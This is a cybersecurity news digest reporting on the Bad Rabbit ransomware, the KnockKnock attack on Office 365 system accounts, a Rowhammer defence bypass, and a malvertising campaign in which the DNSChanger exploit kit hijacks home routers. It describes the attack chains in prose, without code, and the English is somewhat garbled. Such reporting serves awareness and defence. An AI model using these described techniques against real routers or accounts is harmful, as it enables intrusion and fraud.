Bad Rabbit – new ransomware spreads via network

The ransomware encrypts files in the system and displays ransom note demanding 0.05 bitcoin (~ $285) from victims to unlock their systems.

According to Trend Micro research, Bad Rabbit spreads t via fake Flash installer “install_flash_player.exe” from compromised sites. At the present time, the link for downloading a fake installer is inaccessible.

New attack scheme on Office 365 corporate users

KnockKnock is discovered by Skyhigh Networks experts, who noted that the key distinction of this new attack is the nature of the accounts that are being targeted. The attack targets on system accounts that are not assigned to any one individual user. System accounts have more privileges and, in addition, they have a more loyal password policy. Having access to the account, it is easier for hackers to continue attacking the corporate network.

Researchers found a new method to bypass protection against Rowhammer attack

A group of scientists from Adelaide, Pennsylvania, Maryland and Graz University of Technology published a study that describes a new way to bypass the defense against Rowhammer attacks.

To launch an attack, hacker need to narrow down the Rowhammer data bombardment to one single row of memory cells, instead of multiple locations. According to the test results, the revised Rowhammer attack may take between 44 to 138 hours, but this shouldn’t be a problem if an attacker targets online servers and cloud providers.

Home Routers Under Attack via Malvertising on Windows, Android Devices

Nowadays, it is difficult to surprise someone by malicious advertising campaigns, but the experts of Proofpoint have discovered a new trend in this area. Now attackers are targeting not on the users ‘ browsers and in their routers. The final goal of the attacker is to inject ads into every page visited by infected victim. Interestingly, the campaign focused not on IE users, as it happens often, but for Chrome users (both desktop and mobile versions).


Attack scheme

Hackers do in the following way: on legitimate sites buy advertising space for ad placement. For this the attackers use AdSupply ad network, OutBrain, Popcash, Propellerads and Taboola. In the ad embedded malicious JavaScript code that uses WebRTC request to Mozilla’s STUN server to discover the local IP address of the victim. Based on this information, the malware determines by a local network user in any home router. If the answer is positive, the attack continues. If not, the user shows an ordinary, harmless advertising, and he avoids trouble.

The owners of the routers do not show a harmless ad. Advertising will take them straight to the exploit kit DNSChanger, which continues the attack. Using steganography, the attacker sends router of the victim image, which contains the AES key. Malicious advertising uses this key to decrypt further traffic received from DNSChanger. So attackers hide their operations from the attention of is professionals.

After receiving AES key, DNSChanger sends the victim a list of the distinguishing features of 166 router (including various models of Linksys, Netgear, D-Link, Comtrend, Zyxel, and Pirelli), which is set based on the type of router, which is then transmitted to the attackers control server. The server has a list of vulnerabilities and hard-coded credentials from different devices, which are used to intercept control over the victim’s router. Proofpoint experts noted that in some cases (if the model allows), the attackers are trying to create an external connection to an administrative port on the router and take control directly.